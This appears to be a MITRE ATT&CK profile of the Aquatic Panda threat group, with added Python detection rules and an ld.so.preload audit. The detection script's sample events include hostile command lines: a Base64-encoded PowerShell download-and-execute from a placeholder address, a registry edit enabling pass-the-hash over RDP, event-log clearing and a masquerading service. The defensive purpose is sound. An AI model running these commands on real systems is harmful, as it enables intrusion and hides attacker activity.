G0143 Aquatic Panda
Aquatic Panda is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, Aquatic Panda has primarily targeted entities in the telecommunications, technology, and government sectors.1
| Item | Value |
|---|---|
| ID | G0143 |
| Associated Names | |
| Version | 2.0 |
| Created | 18 January 2022 |
| Last Modified | 10 October 2024 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1087 | Account Discovery | Aquatic Panda used the `last` utility in Linux environments to identify recently logged-in users on victim machines.2 |
| enterprise | T1595 | Active Scanning | - |
| enterprise | T1595.002 | Vulnerability Scanning | Aquatic Panda has used publicly accessible DNS logging services to identify servers vulnerable to Log4Shell (CVE-2021-44228) in Log4j.1 |
| enterprise | T1560 | Archive Collected Data | - |
| enterprise | T1560.001 | Archive via Utility | Aquatic Panda has used several publicly available tools, including WinRAR and 7zip, to compress collected files and memory dumps prior to exfiltration.1,2 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.1 |
| enterprise | T1059.003 | Windows Command Shell | Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to cmd /C.1 |
| enterprise | T1059.004 | Unix Shell | Aquatic Panda used malicious shell scripts in Linux environments following access via SSH to install Linux versions of Winnti malware.2 |
| enterprise | T1543 | Create or Modify System Process | - |
| enterprise | T1543.003 | Windows Service | Aquatic Panda created new Windows services for persistence that masqueraded as legitimate Windows services via name change.2 |
| enterprise | T1005 | Data from Local System | Aquatic Panda captured the local Windows Security event log from victim machines using the wevtutil utility to export its contents to an .evtx output file.2 |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.001 | DLL | Aquatic Panda has used DLL search-order hijacking to load exe, dll, and dat files into memory.1 Aquatic Panda loaded a malicious DLL into the legitimate Windows Security Health Service executable (SecurityHealthService.exe) to execute malicious code on victim systems.2 |
| enterprise | T1574.006 | Dynamic Linker Hijacking | Aquatic Panda modified /etc/ld.so.preload in Linux environments to enable persistence for Winnti malware.2 |
| enterprise | T1562 | Impair Defenses | - |
| enterprise | T1562.001 | Disable or Modify Tools | Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.1 |
| enterprise | T1070 | Indicator Removal | - |
| enterprise | T1070.001 | Clear Windows Event Logs | Aquatic Panda clears Windows Event Logs following activity to evade defenses.2 |
| enterprise | T1070.003 | Clear Command History | Aquatic Panda cleared command history in Linux environments to remove traces of activity after operations.2 |
| enterprise | T1070.004 | File Deletion | Aquatic Panda has deleted malicious executables from compromised machines.1,2 |
| enterprise | T1105 | Ingress Tool Transfer | Aquatic Panda has downloaded additional malware onto compromised hosts.1 |
| enterprise | T1654 | Log Enumeration | Aquatic Panda enumerated authentication-related logs in Linux environments prior to deleting selected entries for defense evasion purposes.2 |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.004 | Masquerade Task or Service | Aquatic Panda created new, malicious services using names such as Windows User Service to attempt to blend in with legitimate items on victim systems.2 |
| enterprise | T1036.005 | Match Legitimate Resource Name or Location | Aquatic Panda renamed or moved malicious binaries to legitimate locations to evade defenses and blend into victim environments.2 |
| enterprise | T1112 | Modify Registry | Aquatic Panda modified the victim registry to enable the Windows Restricted Admin mode feature for RDP, which allows pass-the-hash logons over RDP to succeed.2 |
| enterprise | T1027 | Obfuscated Files or Information | - |
| enterprise | T1027.010 | Command Obfuscation | Aquatic Panda has encoded PowerShell commands in Base64.1 |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.001 | Malware | Aquatic Panda has acquired and used njRAT in its operations.1 |
| enterprise | T1588.002 | Tool | Aquatic Panda has acquired and used Cobalt Strike in its operations.1 |
| enterprise | T1003 | OS Credential Dumping | - |
| enterprise | T1003.001 | LSASS Memory | Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.1 |
| enterprise | T1021 | Remote Services | Aquatic Panda used remote scheduled tasks to install malicious software on victim systems during lateral movement actions.2 |
| enterprise | T1021.001 | Remote Desktop Protocol | Aquatic Panda leveraged stolen credentials to move laterally via RDP in victim environments.2 |
| enterprise | T1021.002 | SMB/Windows Admin Shares | Aquatic Panda used remote shares to enable lateral movement in victim environments.2 |
| enterprise | T1021.004 | SSH | Aquatic Panda used SSH with captured user credentials to move laterally in victim environments.2 |
| enterprise | T1518 | Software Discovery | - |
| enterprise | T1518.001 | Security Software Discovery | Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.1 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.011 | Rundll32 | Aquatic Panda used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary.2 |
| enterprise | T1082 | System Information Discovery | Aquatic Panda has used native OS commands to understand privilege levels and system details.1 |
| enterprise | T1033 | System Owner/User Discovery | Aquatic Panda gathers information on recently logged-in users on victim devices.2 |
| enterprise | T1007 | System Service Discovery | Aquatic Panda has attempted to discover services for third party EDR products.1 |
| enterprise | T1550 | Use Alternate Authentication Material | - |
| enterprise | T1550.002 | Pass the Hash | Aquatic Panda used a registry edit to enable the Windows Restricted Admin mode feature in victim environments. This change allowed Aquatic Panda to use pass the hash over RDP, because with Restricted Admin mode enabled an RDP connection can be established with a valid account name and NTLM hash alone, without possessing the cleartext password.2 |
| enterprise | T1078 | Valid Accounts | - |
| enterprise | T1078.002 | Domain Accounts | Aquatic Panda used multiple mechanisms to capture valid user accounts for victim domains to enable lateral movement and access to additional hosts in victim environments.2 |
| enterprise | T1047 | Windows Management Instrumentation | Aquatic Panda used WMI for lateral movement in victim environments.2 |
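Several of the Windows rows above (the Restricted Admin registry change under T1112/T1550.002, wevtutil export and clearing under T1005/T1070.001, Unix syntax passed to cmd /C under T1059.003, service creation with a Windows-sounding name under T1543.003/T1036.004, rundll32 loading a .dat file under T1218.011, and Base64-encoded PowerShell under T1059.001/T1027.010) share one data source: process-creation command lines (Security 4688 with command-line auditing enabled, or Sysmon Event ID 1). The script below is an added example written for this page, not ATT&CK or CrowdStrike code, showing indicator-level rules over such command lines. The sample events, host names, file paths, service name and the 198.51.100.7 URL are constructed; the rules assume that Restricted Admin mode is toggled by the DisableRestrictedAdmin value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (0 enables it), which is how Windows documents that setting.

```python
import base64
import re

# Directories an attacker can usually write to without admin rights (lower-case, because the
# rules compare against lower-cased command lines). Extend for your own estate.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\", "\\appdata\\")

# Commands that exist in a Unix shell but not in cmd.exe; seeing one after "cmd /C"
# suggests an operator pasting Linux tradecraft onto a Windows host.
UNIX_ONLY = {"ls", "cat", "chmod", "chown", "uname", "pwd", "bash", "sh"}


def check_restricted_admin(cmd):
    """T1112 / T1550.002: DisableRestrictedAdmin set to 0 enables RDP Restricted Admin mode."""
    low = cmd.lower()
    if "disablerestrictedadmin" in low and re.search(r"/d\s+0\b", low):
        return "T1112/T1550.002 Restricted Admin mode enabled; RDP pass-the-hash now possible"
    return None


def check_wevtutil(cmd):
    """T1070.001 / T1005: event log cleared or exported with wevtutil."""
    low = cmd.lower()
    if re.search(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", low):
        return "T1070.001 Windows event log cleared"
    if re.search(r"\bwevtutil(?:\.exe)?\s+(?:epl|export-log)\b", low):
        return "T1005 event log exported to a file"
    return None


def check_unix_via_cmd(cmd):
    """T1059.003: Unix-only command passed to cmd /C."""
    m = re.search(r'\bcmd(?:\.exe)?\s+/c\s+"?([a-z]+)\b', cmd.lower())
    if m and m.group(1) in UNIX_ONLY:
        return f"T1059.003 Unix shell syntax ({m.group(1)}) passed to cmd /C"
    return None


def check_service_create(cmd):
    """T1543.003 / T1036.004: new service whose binary lives in a user-writable path."""
    m = re.search(r'\bsc(?:\.exe)?\s+create\s+"?(.+?)"?\s+binpath=\s*"?([^"\s]+)', cmd.lower())
    if m and any(p in m.group(2) for p in USER_WRITABLE):
        return f"T1543.003/T1036.004 service '{m.group(1)}' created with binary {m.group(2)}"
    return None


def check_rundll32(cmd):
    """T1218.011: rundll32 loading a non-.dll file or a file from a user-writable path."""
    m = re.search(r'\brundll32(?:\.exe)?\s+"?([^\s",]+)', cmd.lower())
    if m:
        path = m.group(1)
        if not path.endswith(".dll") or any(p in path for p in USER_WRITABLE):
            return f"T1218.011 rundll32 loading {path}"
    return None


def decode_encoded_powershell(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_encoded_powershell(cmd):
    """T1059.001 / T1027.010: Base64-encoded PowerShell, reported in decoded form."""
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        return f"T1059.001/T1027.010 encoded PowerShell decodes to: {decoded}"
    return None


RULES = (check_restricted_admin, check_wevtutil, check_unix_via_cmd,
         check_service_create, check_rundll32, check_encoded_powershell)


def triage(events):
    """Run every rule over each {'host', 'cmd'} event; return (host, cmd, finding) hits."""
    hits = []
    for ev in events:
        for rule in RULES:
            finding = rule(ev["cmd"])
            if finding:
                hits.append((ev["host"], ev["cmd"], finding))
    return hits


# Constructed sample command lines (not real telemetry); the URL is a documentation-range address.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": r"reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f"},
    {"host": "ws01", "cmd": r"wevtutil epl Security C:\Windows\Temp\sec.evtx"},
    {"host": "ws01", "cmd": r"wevtutil cl Security"},
    {"host": "ws01", "cmd": r"cmd /C ls -la /tmp"},
    {"host": "ws01", "cmd": r'sc create "Windows User Service" binPath= "C:\Windows\Temp\svc.exe" start= auto'},
    {"host": "ws01", "cmd": r"rundll32.exe C:\ProgramData\update.dat,Start"},
    {"host": "ws01", "cmd": "powershell -enc " + ENCODED},
    {"host": "ws02", "cmd": r"sc query type= service state= all"},   # benign: no hit expected
    {"host": "ws02", "cmd": r"wevtutil qe Application /c:5"},       # benign: no hit expected
]

if __name__ == "__main__":
    for host, cmd, finding in triage(SAMPLE_EVENTS):
        print(f"{host}: {finding}\n    {cmd}")
```

These are string matches on the process command line, so they sit at the bottom of the pyramid of pain: a renamed wevtutil.exe, or a service created through the service control API rather than sc.exe, slips past them. Pair them with records that do not depend on how the action was taken: the Security log's own entry for a clear (Event ID 1102) and the System log's service-installation event (7045).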
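For the T1574.006 row: /etc/ld.so.preload is a whitespace-separated list of shared objects that the glibc dynamic loader maps into every dynamically linked process, which is why a single line there is enough for persistence and why, on a clean host, the file is absent or empty. The audit function below is an added example for this page, not code from ATT&CK or CrowdStrike; the sample file content, library names and allowlist entry are constructed.

```python
import re

# Locations where a legitimately preloaded library would normally live.
TRUSTED_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def audit_ld_preload(content, allowlist=()):
    """Return [(entry, reason)] for every /etc/ld.so.preload entry that is not allowlisted.

    Every entry is reported, because the file is empty on a clean host; entries outside the
    standard library directories, with a hidden path component, or not named like a shared
    object get those reasons spelled out so they can be prioritised.
    """
    findings = []
    for entry in content.split():          # the loader reads a whitespace-separated list
        if entry in allowlist:
            continue
        reasons = []
        if not entry.startswith(TRUSTED_DIRS):
            reasons.append("outside standard library directories")
        if any(part.startswith(".") for part in entry.split("/") if part):
            reasons.append("hidden path component")
        if not re.search(r"\.so(?:\.\d+)*$", entry):
            reasons.append("not named like a shared object")
        if not reasons:
            reasons.append("preload entry not on allowlist")
        findings.append((entry, "; ".join(reasons)))
    return findings


# Constructed sample content (not taken from a real host).
SAMPLE_PRELOAD = """\
/usr/lib/libagent-hooks.so
/usr/lib64/libfoo.so.2
/tmp/.cache/libsys.so
/var/tmp/update
"""

if __name__ == "__main__":
    # Hypothetical allowlist entry standing in for an endpoint agent's documented preload library.
    for entry, reason in audit_ld_preload(SAMPLE_PRELOAD, allowlist=("/usr/lib/libagent-hooks.so",)):
        print(f"{entry}: {reason}")
```

To run it against a live host, pass open("/etc/ld.so.preload").read() instead of the sample. Note that a preloaded library can hook libc calls such as readdir and open to hide the file and itself from tools on the same host, so read the file with a statically linked binary or from a mounted disk image where possible, and treat any unexplained finding as a host to image rather than clean in place.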
Software
References
1. Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.
2. CrowdStrike. (2023). 2022 Falcon OverWatch Threat Hunting Report. Retrieved May 20, 2024.